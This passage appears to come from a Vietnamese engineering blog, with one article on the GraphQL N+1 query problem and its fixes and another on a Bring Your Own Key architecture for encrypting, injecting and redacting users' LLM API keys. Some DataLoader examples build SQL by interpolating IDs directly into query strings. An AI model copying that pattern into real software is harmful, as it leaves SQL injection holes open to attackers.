</code></pre><p>Developer nhìn vào thấy: <strong>readable</strong>, <strong>async/await</strong> đẹp,<strong> logic</strong> đúng.<br>Nhưng phía dưới là <strong>N+1 queries</strong>.</p><hr><h2 id="v-sao-graphql-c-bi-t-d-g-p-n-1">Vì sao GraphQL đặc biệt dễ gặp N+1?</h2><p>Trong REST, backend quyết định response shape, backend chủ động và biết rõ data trả về như thế nào, nhìn thấy toàn bộ response shape trước khi code. Nhưng GraphQL cho phép client tự define query — điều này cực mạnh, nhưng cũng nguy hiểm.</p><p><strong>Resolver hoạt động độc lập theo từng field.</strong> Mỗi tầng có thể tiếp tục tạo thêm query.</p><h3 id="query-explosion-v-d-th-c-t-">Query Explosion — ví dụ thực tế</h3><p>Giả sử: 10 users, mỗi user có 5 posts, mỗi post có 10 comments.</p><pre><code class="language-graphql">query {
  users {          # 10 users
    posts {        # 5 posts/user
      comments {   # 10 comments/post
        author { name }
      }
    }
  }
}
</code></pre><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Step</th>
<th>Thao tác</th>
<th>Số queries</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td><code>users()</code></td>
<td>1</td>
</tr>
<tr>
<td>2</td>
<td><code>posts(user)</code> × 10 users</td>
<td>10</td>
</tr>
<tr>
<td>3</td>
<td><code>comments(post)</code> × 50 posts</td>
<td>50</td>
</tr>
<tr>
<td>4</td>
<td><code>author(comment)</code> × 500 comments</td>
<td>500</td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td></td>
<td><strong>561 queries</strong></td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p><strong>561 queries cho 10 users</strong> — và không ai thấy vấn đề cho đến khi production đổ.</p><hr><h2 id="-i-u-khi-n-n-1-c-c-k-nguy-hi-m">Điều khiến N+1 cực kỳ nguy hiểm</h2><h3 id="local-kh-ng-th-y-v-n-">Local không thấy vấn đề</h3><p>Ở local với vài trăm, vài nghìn records, mọi thứ chạy rất nhanh. Và team sẽ nói: <em>"Ổn rồi, release thôi."</em></p><h3 id="qa-kh-detect">QA khó detect</h3><p>QA test: data đúng không, response đúng không — họ không kiểm tra <strong>query count</strong> hay <strong>latency dưới load</strong>. Nếu test thực tế stress load với data lớn thì mới có thể phát hiện vấn đề.</p><h3 id="orm-che-gi-u-v-n-">ORM che giấu vấn đề</h3><pre><code class="language-js">// TypeORM lazy loading — nhìn như object access bình thường
const user = await User.findOne(id);
const posts = await user.posts; // đây là 1 query
</code></pre><p>ORM khiến developer <strong>mất cảm giác về database</strong>. Nhiều developer dần không đọc SQL, không hiểu execution plan, không biết query count. Họ chỉ nhìn thấy object access (user.posts) — nhưng phía dưới có thể là hàng trăm queries.</p><hr><h3 id="database-kh-ng-ch-t-v-1-query-c-c-l-n">Database không chết vì 1 query cực lớn</h3><p>Nó chết vì <strong>hàng nghìn query nhỏ</strong>.</p><pre><code>1 query = 2ms  ✅
1000 queries = 2000ms + overhead ❌
</code></pre><p>Chưa tính: network overhead, connection acquire, serialization, lock wait, context switching.</p><hr><h2 id="2-gi-i-ph-p-v-y-l-m-sao-gi-i-quy-t">2. Giải pháp: Vậy làm sao để giải quyết?</h2><p><strong>DataLoader</strong> là giải pháp nổi tiếng nhất cho GraphQL N+1.</p><p><strong>Ý tưởng:</strong> thay vì query ngay, <strong>gom tất cả IDs lại</strong> và query 1 lần duy nhất.</p><h3 id="kh-ng-d-ng-dataloader">Không dùng DataLoader</h3><pre><code class="language-js">// 100 users → 1 query user + 100 queries post
User: {
  posts: (user) => db.query(`SELECT * FROM posts WHERE user_id = ${user.id}`)
}
</code></pre><h3 id="d-ng-dataloader">Dùng DataLoader</h3><pre><code class="language-js">const postLoader = new DataLoader(async (userIds) => {
  const posts = await db.query(
    `SELECT * FROM posts WHERE user_id IN (${userIds.join(",")})`
  );
  return userIds.map(id => posts.filter(p => p.user_id === id));
});

// Resolver
User: {
  posts: (user) => postLoader.load(user.id)
}
</code></pre><p>GraphQL gọi <code>postLoader.load()</code> cho từng user, DataLoader <strong>gom lại</strong> → chỉ còn <strong>1 query</strong>.</p><h3 id="dataloader-c-n-c-request-level-cache">DataLoader còn có request-level cache</h3><pre><code class="language-js">// Cùng 1 request, user_id = 1 được load 2 lần
postLoader.load(1); // query
postLoader.load(1); // cache hit — không query lại
</code></pre><hr><h3 id="nh-ng-dataloader-c-ng-kh-ng-ph-i-ho-n-to-n-x-l-tri-t-n-1-query">Nhưng DataLoader cũng không phải hoàn toàn xử lý triệt để N+1 query</h3><p>Nếu query depth quá lớn:</p><pre><code class="language-graphql">users → posts → comments → authors → followers → ...
query {
  organizations {
    users {
      posts {
        comments {
          author {
            organizations {
              users {
                posts {
                  id
                }
              }
            }
          }
        }
      }
    }
  }
}</code></pre><p>Workload vẫn khổng lồ. DataLoader giảm được N+1 nhưng không giải quyết được <strong>bad query design</strong>.</p><p>DataLoader có thể biến:</p><pre><code class="language-js">SELECT * FROM users WHERE organization_id = ?
</code></pre><p>thành</p><pre><code class="language-js">SELECT * FROM users WHERE organization_id IN (...)
</code></pre><p>nhưng nếu query đòi lấy:</p><ul><li>100 organizations</li><li>mỗi organization 100 users</li><li>mỗi user 100 posts</li><li>mỗi post 100 comments</li></ul><p>thì kết quả vẫn là: 100 × 100 × 100 × 100 = 100 triệu records</p><h3 id="m-t-v-n-kh-c-overfetching-b-ng-join">Một vấn đề khác: Overfetching bằng JOIN</h3><p>Một số team chống N+1 bằng cách JOIN tất cả:</p><pre><code class="language-sql">SELECT u.*, p.*, c.*
FROM users u
LEFT JOIN posts p ON p.user_id = u.id
LEFT JOIN comments c ON c.post_id = p.id
</code></pre><p>- Query giảm từ nhiều lần xuống một lần, nhưng đổi lại là dữ liệu bị lặp, payload lớn hơn cần thiết, tốn RAM và chậm serialize.</p><p>- Ví dụ, một user có 100 posts và mỗi post có 50 comments có thể tạo ra hàng nghìn dòng kết quả chỉ để biểu diễn cùng một user.</p><p><strong>N+1 query</strong> và <strong>JOIN</strong> quá nhiều đều không phải lời giải hoàn hảo. Công việc của backend engineer là lựa chọn điểm cân bằng phù hợp giữa số lượng query, lượng dữ liệu trả về và chi phí xử lý của hệ thống tùy từng trường hợp sử dụng.</p><hr><h2 id="c-c-k-thu-t-th-ng-d-ng-gi-p-kh-c-ph-c-i-u-n-y">Các kỹ thuật  thường dùng giúp khắc phục điều này</h2><h3 id="2-1-query-complexity-analysis"> 2.1 Query Complexity Analysis</h3><p>Tính độ phức tạp của query trước khi execute.</p><pre><code class="language-graphql">query {
  organizations { 	// 10 record
    users {		  	// x10		
      posts {		// x10
        comments { 	// x10
          author {
            name
          }
        }
      }
    }
  }
}

complexity = 10x10x10x10 = 10000</code></pre><p>Nếu vượt ngưỡng:</p><!--kg-card-begin: markdown--><pre><code>if (complexity > 5000) {
  throw new Error("Query too complex");
}</code></pre>
<!--kg-card-end: markdown--><h3 id="2-2-batch-loading"> 2.2 Batch loading</h3><pre><code class="language-js">// Thay vì:
for (const id of ids) await fetchUser(id);

// Dùng:
await fetchUsers(ids); // 1 query
</code></pre><h3 id="2-3-preloading"> 2.3 Preloading</h3><p>Một số relation nên preload trước khi vào resolver:</p><pre><code class="language-js">const users = await User.findAll({ include: [{ model: Post }] });
</code></pre><h3 id="2-4-depth-limiting"> 2.4 Depth limiting</h3><p>Giới hạn độ sâu của GraphQL query để tránh query explosion:</p><pre><code class="language-graphql">Max Depth = 5

query {
  user {
    posts {
      comments {
        user {
          id
        }
      }
    }
  }
}
</code></pre><pre><code class="language-js">import depthLimit from 'graphql-depth-limit';
const server = new ApolloServer({
  validationRules: [depthLimit(5)]
});
</code></pre><p>Với Depth = 5 => Query sâu hơn sẽ bị từ chối:</p><pre><code class="language-js">{"errors": [{"message": "Query exceeds maximum depth"}]}

</code></pre><h3 id="2-5-query-specific-resolver"> 2.5 Query-specific Resolver</h3><p>Đối với dashboard (hoặc các tác vụ business tương tự), tránh dùng <code>graph traversal</code> chỉ để lấy count hoặc statistics vì sẽ fetch nhiều dữ liệu không cần thiết. </p><p><strong>Không nên</strong></p><pre><code class="language-graphql">query {
  dashboard {
    users {
      id
    }
  }
}</code></pre><p>Sau đó FE tự đếm:</p><pre><code class="language-js">business.users.length</code></pre><p><br><strong> Mà nên tạo resolver riêng</strong> để query trực tiếp các giá trị aggregate cần thiết.</p><pre><code class="language-graphql">query {
    dashboard {
      totalUsers
      totalPosts
      latestComments
	}
}</code></pre><p>=> Cách này giảm payload, tránh N+1 và tối ưu cho dashboard.</p><h3 id="2-6-persisted-queries"><br> 2.6 Persisted queries</h3><p>Không cho phép client gửi query tùy ý, mà chỉ được gọi những query đã được đăng ký trước trên server.</p><pre><code class="language-js">POST /graphql
{"queryId": "dashboard_v2"}
</code></pre><p>Server:</p><pre><code class="language-js">dashboard_v2
=> query đã được review
=> complexity đã biết</code></pre><h3 id="2-7-cache">2.7 Cache</h3><p>DataLoader chỉ cache trong 1 request.</p><p>Thường kết hợp thêm:</p><ul><li>Redis</li><li>CDN</li><li>Response Cache</li><li>Apollo Cache</li></ul><h3 id="th-c-t-s-gi-i-quy-t-nh-sau">Thực tế sẽ giải quyết như sau</h3><p>GraphQL<br>├─ DataLoader<br>├─ Depth Limit<br>├─ Complexity Limit<br>├─ Pagination<br>├─ Redis Cache<br>├─ Custom Dashboard Queries<br>└─ Persisted Queries</p><hr><h2 id="3-index-v-partition-c-gi-i-quy-t-c-n-1-kh-ng">3. Index và Partition có giải quyết được N+1 không?</h2><p>Liên hệ với <a href="https://blog.vietnamlab.vn/toi-uu-toc-do-query-trong-co-so-du-lieu-voi-indexing-partitioning/">bài viết trước đây</a> về index và partition. Liệu nếu tôi đánh index và partition đúng thì chắc có lẽ sẽ giải quyết được phần N+1 query này thôi ?</p><p>Nhưng sự thật là Có thể giúp, nhưng không giải quyết được gốc của N+1.</p><p>Nhiều team khi thấy query chậm nên:</p><ul><li>Thêm index</li><li>Partition table</li><li>Tăng RDS size</li><li>Thêm Redis</li><li>Scale pod</li></ul><p>Trong khi vấn đề thật sự là: <strong>quá nhiều queries</strong>, mỗi query lại quá chậm.</p><h3 id="index-c-gi-p-kh-ng">Index có giúp không?</h3><p><strong>Có thể giúp, nhưng không giải quyết được gốc của N+1.</strong></p><ul><li><code>1 query = 2ms</code> → rất nhanh</li><li><code>1000 queries = 2000ms</code> <br>→ chưa tính overhead, network overhead, connection, serialization, lock wait, context switching</li></ul><p>=> Index không giảm roundtrip, Mỗi query vẫn cần:</p><p><code>acquire connection → gửi SQL → DB parse → execution → return data → deserialize → release connection</code></p><p></p><p>Trong khi N+1 sẽ khiến làm việc này lặp lại hàng trăm lần.</p><p>Đây là thứ nhiều người bỏ qua.Còn <strong>Partition</strong> có giúp không? Có, nhưng ở layer khác.</p><h3 id="partition-c-gi-p-kh-ng">Partition có giúp không?</h3><p>Partition giúp giảm <code>scan size</code>, <code>improve large table performance</code>. Nhưng không giải quyết số lần roundtrip.</p><blockquote><strong>Điều này giống như :</strong> Bạn ship hàng cho 1000 khách hàng với cùng 1 đích đến.<br>- Không có N+1 → 1 chuyến xe tải: 1 lần thực hiện cho phép xử lý toàn bộ hàng hóa.<br>- Có N+1 → 1000 chuyến xe máy.</blockquote><p>=> <strong>Index/Partition giúp</strong>: con đường di chuyển thông thoáng, phân tải nhiều hướng để di chuyển hơn, gọn gàng hơn, nhưng bạn <code><strong>vẫn đang đi 1000 chuyến</strong></code>.</p><h3 id="sai-l-m-ph-bi-n-c-a-team-backend">Sai lầm phổ biến của team backend</h3><p>Khi gặp chậm thì làm rất nhiều cách cao siêu, tốn nhiều thời gian, chi phí hạ tầng:</p><p>Trong khi chỉ cần:</p><p><code>Fix N+1 → reduce query count → batch loading → optimize fetch strategy → rồi mới tuning DB</code></p><p><strong>Thứ tự fix đúng:</strong></p><pre><code>Fix N+1
→ Reduce query count
→ Batch loading
→ Optimize fetch strategy
→ Rồi mới tuning DB
</code></pre><hr><h2 id="rule-quan-tr-ng-nh-t-khi-vi-t-graphql-resolver">Rule quan trọng nhất khi viết GraphQL resolver</h2><p>❌ Đừng hỏi: <em>"Query này có đúng không?"</em></p><p>✅ Hãy hỏi: <strong>"Query này sẽ tạo ra bao nhiêu SQL khi có 1000 records?"</strong></p><hr><h2 id="k-t-lu-n">Kết luận</h2><p><code><strong>N+1 Query Problem</strong></code> không chỉ là vấn đề performance. Nó phản ánh:</p><ul><li>Cách developer <strong>hiểu database</strong></li><li>Cách team <strong>thiết kế architecture</strong></li><li>Mức độ <strong>observability</strong> của hệ thống</li></ul><p>Điều đáng sợ nhất về N+1 là: <strong>code vẫn chạy đúng</strong> — cho tới ngày production traffic tăng lên.</p><p>Và lúc đó, thêm CPU, thêm pod, thêm cache đều <strong>không cứu được</strong> — bởi vì gốc rễ vấn đề nằm ở <strong>cách dữ liệu được fetch</strong>.</p><p></p><p>Tài liệu tham khảo:</p><ul><li><a href="https://graphql.org/">https://graphql.org</a></li><li><a href="https://docs.sentry.io/product/issues/issue-details/performance-issues/n-one-queries/">https://docs.sentry.io/product/issues/issue-details/performance-issues/n-one-queries</a></li></ul>
</article>
<article>
<h1>Bring Your Own Key (BYOK): Kiến trúc hệ thống cho việc tích hợp API Key LLM của người dùng</h1>
<p>B.D.N — Sat, 27 Jun 2026 08:39:57 GMT</p>
<h2 id="m-u-v-sao-byok-ang-tr-th-nh-ti-u-chu-n-ng-m">Mở đầu: Vì sao BYOK đang trở thành tiêu chuẩn ngầm</h2><p>Nếu bạn đang xây một sản phẩm có tích hợp LLM — chatbot, agent, tool gọi OpenAI/Anthropic — sớm hay muộn bạn sẽ gặp câu hỏi này từ khách hàng enterprise: <em>"Tôi có thể dùng API key của chính mình không?"</em></p><p>Lý do họ hỏi không phải vì tiết kiệm vài đô. Đó là:</p><ul><li><strong>Compliance & data residency</strong>: một số tổ chức bị ràng buộc hợp đồng hoặc quy định pháp lý, không được để traffic AI đi qua billing account của bên thứ ba.</li><li><strong>Rate limit & quota riêng</strong>: họ đã có tier cao với OpenAI/Anthropic, không muốn bị giới hạn bởi quota chung của SaaS bạn đang vận hành.</li><li><strong>Kiểm soát chi phí</strong>: enterprise muốn nhìn thấy chi phí AI trực tiếp trên dashboard billing của họ, không qua markup của bạn.</li><li><strong>Tách rủi ro vendor lock-in</strong>: nếu họ đổi provider, họ không phụ thuộc vào việc bạn có hỗ trợ kịp hay không.</li></ul><p>BYOK (Bring Your Own Key) giải quyết đúng vấn đề đó: thay vì hệ thống của bạn dùng một key trung tâm để gọi LLM cho tất cả người dùng, mỗi tenant/người dùng tự cung cấp API key của riêng họ (OpenAI, Anthropic, Azure OpenAI, v.v.), và hệ thống của bạn chỉ đóng vai trò orchestration — định tuyến, áp dụng business logic, nhưng <strong>không sở hữu</strong> thẻ tín dụng hay chịu trách nhiệm billing cho lưu lượng AI đó.</p><p>Nghe đơn giản, nhưng làm đúng thì có khá nhiều bẫy: lưu key thế nào để không lộ ra production logs, runtime injection key sao cho không tăng latency, multi-tenancy ra sao khi một user có thể có nhiều key cho nhiều provider, và rotate/revoke key thế nào khi không có quyền truy cập trực tiếp vào tài khoản của provider.</p><p>Bài viết này đi qua kiến trúc đầy đủ của một hệ thống BYOK cho LLM, với các ví dụ minh hoạ bằng NestJS/Node.js trên AWS — một stack phổ biến cho loại hệ thống này, nhưng các nguyên tắc kiến trúc áp dụng được cho bất kỳ ngôn ngữ/nền tảng nào.</p><h2 id="1-m-h-nh-t-ng-quan-byok-ng-u-trong-request-lifecycle">1. Mô hình tổng quan: BYOK đứng ở đâu trong request lifecycle</h2><p>Trước khi đi vào chi tiết, hãy hình dung một request lifecycle điển hình:</p><pre><code>Client → API Gateway/ALB → NestJS App
                                │
                                ├─ 1. Xác định tenant/user
                                ├─ 2. Resolve API key (BYOK hoặc fallback key hệ thống)
                                ├─ 3. Decrypt key (KMS/Vault)
                                ├─ 4. Inject key vào LLM client (runtime, không cache plaintext lâu)
                                ├─ 5. Gọi LLM provider (OpenAI/Anthropic/...)
                                ├─ 6. Stream/aggregate response
                                └─ 7. Log usage (không log key) + billing reconciliation
</code></pre><p>Ba khối kiến trúc cốt lõi mà bài viết này tập trung là:</p><ol><li><strong>Key Storage Layer</strong> — lưu trữ an toàn, mã hoá, versioning.</li><li><strong>Runtime Injection Layer</strong> — luồng request lúc gọi API thực tế.</li><li><strong>Multi-tenancy & Key Management Layer</strong> — quản lý nhiều key, nhiều provider, theo từng tenant.</li></ol><h2 id="2-b-o-m-t-l-u-tr-key-storage-layer-">2. Bảo mật lưu trữ Key (Storage Layer)</h2><h3 id="2-1-nguy-n-t-c-b-t-bi-n-kh-ng-bao-gi-l-u-plaintext">2.1. Nguyên tắc bất biến: không bao giờ lưu plaintext</h3><p>API key của OpenAI/Anthropic về bản chất tương đương với một "bearer credential" — ai có key đó coi như có quyền chi tiêu trên tài khoản người dùng. Vì vậy nguyên tắc đầu tiên không thể thoả hiệp: <strong>không bao giờ lưu key ở dạng plaintext trong database</strong>, dù là Postgres, DynamoDB hay Redis.</p><p>Có ba lựa chọn phổ biến, theo thứ tự độ phức tạp tăng dần:</p><h4 id="option-a-envelope-encryption-v-i-aws-kms">Option A — Envelope Encryption với AWS KMS</h4><p>Đây là lựa chọn phù hợp nhất cho hầu hết hệ thống chạy trên AWS, vì tận dụng được hạ tầng IAM sẵn có.</p><p>Cơ chế:</p><ul><li>Tạo một <strong>Customer Master Key (CMK)</strong> trong KMS, ví dụ <code>alias/byok-master-key</code>.</li><li>Khi người dùng nhập API key, hệ thống gọi <code>kms:GenerateDataKey</code> để lấy một <strong>Data Encryption Key (DEK)</strong> — KMS trả về cả plaintext DEK và ciphertext DEK.</li><li>Dùng plaintext DEK để mã hoá API key bằng AES-256-GCM, sau đó <strong>xoá plaintext DEK khỏi memory ngay lập tức</strong>.</li><li>Lưu vào DB: <code>encrypted_key</code> (ciphertext của API key) + <code>encrypted_dek</code> (ciphertext của DEK) + <code>iv</code>/<code>auth_tag</code>.</li><li>Khi cần dùng: gọi <code>kms:Decrypt</code> trên <code>encrypted_dek</code> để lấy lại plaintext DEK, dùng nó decrypt API key, rồi xoá khỏi memory sau khi dùng xong.</li></ul><p>Đây gọi là <strong>envelope encryption</strong> — bạn không gọi KMS để decrypt trực tiếp API key (tốn chi phí + có giới hạn kích thước 4KB cho KMS), mà chỉ dùng KMS để bảo vệ DEK, còn DEK bảo vệ data thực tế.</p><p>Ví dụ minh hoạ trong NestJS (rút gọn, bỏ qua error handling đầy đủ):</p><pre><code class="language-typescript">// kms-encryption.service.ts
import { KMSClient, GenerateDataKeyCommand, DecryptCommand } from '@aws-sdk/client-kms';
import * as crypto from 'crypto';

@Injectable()
export class KmsEncryptionService {
  private kms = new KMSClient({ region: process.env.AWS_REGION });
  private readonly keyId = process.env.KMS_KEY_ID;

  async encryptApiKey(plaintextKey: string): Promise<EncryptedPayload> {
    const { Plaintext, CiphertextBlob } = await this.kms.send(
      new GenerateDataKeyCommand({ KeyId: this.keyId, KeySpec: 'AES_256' }),
    );

    const iv = crypto.randomBytes(12);
    const cipher = crypto.createCipheriv('aes-256-gcm', Plaintext, iv);
    const encrypted = Buffer.concat([
      cipher.update(plaintextKey, 'utf8'),
      cipher.final(),
    ]);

    // Xoá plaintext DEK khỏi memory ngay
    Plaintext.fill(0);

    return {
      encryptedKey: encrypted.toString('base64'),
      encryptedDek: Buffer.from(CiphertextBlob).toString('base64'),
      iv: iv.toString('base64'),
      authTag: cipher.getAuthTag().toString('base64'),
    };
  }

  async decryptApiKey(payload: EncryptedPayload): Promise<string> {
    const { Plaintext: dek } = await this.kms.send(
      new DecryptCommand({
        CiphertextBlob: Buffer.from(payload.encryptedDek, 'base64'),
      }),
    );

    const decipher = crypto.createDecipheriv(
      'aes-256-gcm',
      dek,
      Buffer.from(payload.iv, 'base64'),
    );
    decipher.setAuthTag(Buffer.from(payload.authTag, 'base64'));

    const decrypted = Buffer.concat([
      decipher.update(Buffer.from(payload.encryptedKey, 'base64')),
      decipher.final(),
    ]);

    dek.fill(0); // xoá DEK khỏi memory sau khi dùng

    return decrypted.toString('utf8');
  }
}
</code></pre><p><strong>Lưu ý quan trọng</strong>: phải set IAM policy cho KMS key sao cho chỉ service role cụ thể (ví dụ ECS Task Role của service xử lý LLM request) mới có quyền <code>kms:Decrypt</code>. Nên tách biệt rõ giữa Task Execution Role (kéo image, ghi log) và Task Role (quyền nghiệp vụ): service ghi key (write path) nên có quyền <code>GenerateDataKey</code>, còn service đọc key lúc runtime chỉ cần <code>Decrypt</code>, không cần <code>GenerateDataKey</code>. Nguyên tắc least-privilege này thu hẹp đáng kể bề mặt rủi ro nếu một service bị compromise.</p><h4 id="option-b-d-ng-aws-secrets-manager-parameter-store">Option B — Dùng AWS Secrets Manager / Parameter Store</h4><p>Phù hợp nếu số lượng key không lớn (vài trăm đến vài nghìn), vì Secrets Manager tính phí theo số secret/tháng. Cách này đơn giản hoá việc rotation vì Secrets Manager có sẵn cơ chế rotation, nhưng không scale tốt cho mô hình SaaS có hàng chục nghìn tenant tự thêm key — lúc đó envelope encryption tự quản lý trong DB sẽ rẻ và linh hoạt hơn.</p><h4 id="option-c-hashicorp-vault-external-secret-store">Option C — HashiCorp Vault / external secret store</h4><p>Cân nhắc khi hệ thống của bạn đã multi-cloud hoặc cần một secret store độc lập với AWS. Phức tạp hơn để vận hành (cần tự quản lý Vault cluster hoặc dùng HCP Vault), nhưng cho khả năng audit trail và dynamic secrets mạnh hơn.</p><p><strong>Khuyến nghị cho hệ thống NestJS chạy trên ECS</strong>: Option A (KMS + envelope encryption) là điểm cân bằng tốt nhất giữa chi phí, độ phức tạp vận hành, và tích hợp tự nhiên với IAM trên AWS.</p><h3 id="2-2-schema-l-u-tr-">2.2. Schema lưu trữ</h3><p>Một schema tối thiểu cho bảng lưu key, theo mô hình multi-tenant, multi-provider:</p><pre><code class="language-sql">CREATE TABLE byok_credentials (
  id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
  tenant_id UUID NOT NULL REFERENCES tenants(id),
  provider VARCHAR(50) NOT NULL,        -- 'openai' | 'anthropic' | 'azure_openai'
  alias VARCHAR(100),                    -- tên gợi nhớ do user đặt
  encrypted_key TEXT NOT NULL,
  encrypted_dek TEXT NOT NULL,
  iv VARCHAR(50) NOT NULL,
  auth_tag VARCHAR(50) NOT NULL,
  key_fingerprint VARCHAR(64) NOT NULL,  -- hash để nhận diện key trùng, KHÔNG dùng để decrypt
  status VARCHAR(20) NOT NULL DEFAULT 'active', -- active | revoked | invalid
  last_validated_at TIMESTAMPTZ,
  last_used_at TIMESTAMPTZ,
  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
  updated_at TIMESTAMPTZ NOT NULL DEFAULT now(),
  UNIQUE (tenant_id, provider, alias)
);

CREATE INDEX idx_byok_tenant_provider ON byok_credentials(tenant_id, provider, status);
</code></pre><p>Vài điểm đáng chú ý:</p><ul><li><strong><code>key_fingerprint</code></strong>: một hash một chiều (ví dụ SHA-256 của key gốc + salt cố định) để hệ thống có thể phát hiện "key này đã được thêm trước đó chưa" mà không cần decrypt. Hữu ích để tránh user vô tình thêm trùng key, hoặc để phát hiện khi cùng một key bị dùng ở nhiều tenant (dấu hiệu rò rỉ).</li><li><strong><code>status</code></strong>: không xoá hẳn key khi user revoke — soft-delete để giữ audit trail, đồng thời tránh trường hợp orphaned reference từ các request log cũ.</li><li><strong><code>last_validated_at</code></strong>: timestamp lần cuối hệ thống gọi một lightweight request (ví dụ <code>GET /v1/models</code>) để xác nhận key còn hợp lệ — quan trọng để phát hiện key bị revoke từ phía provider trước khi user gặp lỗi giữa luồng nghiệp vụ.</li></ul><h2 id="3-lu-ng-request-runtime-proxy-key-injection">3. Luồng Request Runtime: Proxy & Key Injection</h2><p>Đây là phần nhiều người đánh giá thấp độ phức tạp. Vấn đề không chỉ là "decrypt key rồi gọi API" — mà là làm sao <strong>không để key tồn tại lâu hơn cần thiết trong memory, không lọt vào log, không tăng latency đáng kể, và vẫn hỗ trợ streaming</strong>.</p><h3 id="3-1-v-tr-t-byok-resolver-trong-nestjs">3.1. Vị trí đặt BYOK Resolver trong NestJS</h3><p>Cách tổ chức hợp lý là tách một <code>BYOKInterceptor</code> hoặc middleware riêng, chạy trước khi request chạm vào LLM client, chứ không nhúng logic decrypt rải rác trong từng service.</p><pre><code class="language-typescript">// byok.interceptor.ts
@Injectable()
export class ByokInterceptor implements NestInterceptor {
  constructor(
    private readonly credentialService: CredentialService,
    private readonly kms: KmsEncryptionService,
  ) {}

  async intercept(context: ExecutionContext, next: CallHandler) {
    const req = context.switchToHttp().getRequest();
    const tenantId = req.tenantId; // gán từ AuthGuard trước đó
    const provider = req.body.provider ?? 'openai';

    const credential = await this.credentialService.resolve(tenantId, provider);

    if (!credential) {
      // Fallback: dùng key hệ thống (nếu sản phẩm hỗ trợ cả 2 mô hình)
      req.llmApiKey = this.credentialService.getSystemFallbackKey(provider);
      req.billingMode = 'platform';
    } else {
      req.llmApiKey = await this.kms.decryptApiKey(credential.payload);
      req.billingMode = 'byok';
    }

    return next.handle().pipe(
      finalize(() => {
        // Xoá reference khỏi request object sau khi response đã gửi xong
        req.llmApiKey = null;
      }),
    );
  }
}
</code></pre><p>Điểm mấu chốt: <code>req.llmApiKey</code> chỉ tồn tại trong vòng đời của một request, không bao giờ được cache lại ở tầng nào khác (không Redis, không log, không gắn vào context truyền sang queue).</p><h3 id="3-2-tuy-t-i-kh-ng-log-key-k-c-v-t-nh">3.2. Tuyệt đối không log key — kể cả vô tình</h3><p>Đây là lỗi thực tế hay gặp nhất: NestJS logger interceptor mặc định log toàn bộ <code>request.body</code> hoặc <code>request.headers</code> để debug, và nếu key được truyền qua header (<code>Authorization: Bearer sk-...</code>) hoặc nằm trong payload, nó sẽ vô tình bị ghi vào CloudWatch Logs.</p><p>Giải pháp: dùng một redaction layer tập trung, không dựa vào việc dev nhớ phải che field.</p><pre><code class="language-typescript">const SENSITIVE_PATTERNS = [/sk-[a-zA-Z0-9]{20,}/g, /sk-ant-[a-zA-Z0-9-]{20,}/g];

function redactSensitive(input: string): string {
  return SENSITIVE_PATTERNS.reduce(
    (acc, pattern) => acc.replace(pattern, '[REDACTED_KEY]'),
    input,
  );
}
</code></pre><p>Áp dụng pattern này ở tầng global logger (ví dụ custom Winston transformer), không chỉ ở nơi bạn nghĩ là "có khả năng" chứa key — vì exception stack trace, error response từ provider, hay thậm chí APM tracing payload (Datadog, New Relic) cũng có thể vô tình mang key đi theo.</p><h3 id="3-3-streaming-v-v-n-gi-key-s-ng-trong-su-t-response">3.3. Streaming và vấn đề giữ key "sống" trong suốt response</h3><p>Với non-streaming request, key chỉ cần tồn tại trong khoảnh khắc gọi API. Nhưng với streaming (SSE từ OpenAI/Anthropic), connection có thể kéo dài vài chục giây — và nếu hệ thống dùng kiến trúc persist chunk (ví dụ Redis Streams) cho khả năng reconnect/replay, cần đặc biệt cẩn thận: <strong>chunk dữ liệu lưu trữ trung gian phải là response content, không phải API key</strong> — đừng để bất kỳ phần nào của request ban đầu (bao gồm key) bị serialize vào payload được lưu lại.</p><p>Một pattern an toàn: decrypt key ngay trước khi mở connection tới provider, giữ nó trong một biến local scope hẹp nhất có thể (không gắn vào object lớn hơn được pass qua nhiều layer), và để nó out-of-scope (GC tự dọn) ngay sau khi HTTP client tới provider đã nhận key vào header.</p><pre><code class="language-typescript">async function streamFromProvider(tenantId: string, provider: string, payload: any) {
  const apiKey = await resolveAndDecryptKey(tenantId, provider); // scope hẹp

  const upstream = await fetch(getProviderEndpoint(provider), {
    method: 'POST',
    headers: { Authorization: `Bearer ${apiKey}`, 'Content-Type': 'application/json' },
    body: JSON.stringify(payload),
  });
  // apiKey không được tham chiếu ở đâu khác sau dòng này

  return upstream.body; // pipe tiếp vào SSE response, hoặc publish chunk vào Redis Stream
}
</code></pre><h3 id="3-4-retry-error-mapping-kh-c-bi-t-quan-tr-ng-so-v-i-platform-key">3.4. Retry & error mapping — khác biệt quan trọng so với platform key</h3><p>Khi dùng key hệ thống, một lỗi <code>429</code> hay <code>401</code> là vấn đề nội bộ bạn tự xử lý (rotate key dự phòng, báo team vận hành). Khi dùng BYOK, lỗi đó là <strong>vấn đề của user</strong> — họ cần biết chính xác là do key họ hết hạn, hết quota, hay do hệ thống bạn có bug. Vì vậy luồng error handling cần phân loại rõ:</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Mã lỗi từ provider</th>
<th>Nguyên nhân khả dĩ</th>
<th>Hành động hệ thống</th>
</tr>
</thead>
<tbody>
<tr>
<td>401</td>
<td>Key sai/đã revoke</td>
<td>Đánh dấu <code>status = invalid</code>, báo user qua UI/email</td>
</tr>
<tr>
<td>429</td>
<td>Vượt rate limit của <em>user's own account</em></td>
<td>Trả lỗi rõ ràng "rate limit từ tài khoản OpenAI của bạn", không phải lỗi hệ thống</td>
</tr>
<tr>
<td>500/503 từ provider</td>
<td>Lỗi tạm thời phía provider</td>
<td>Retry với backoff, không đánh dấu key invalid</td>
</tr>
<tr>
<td>Timeout</td>
<td>Network hoặc provider chậm</td>
<td>Retry có giới hạn, log riêng để phân biệt khỏi lỗi key</td>
</tr>
</tbody>
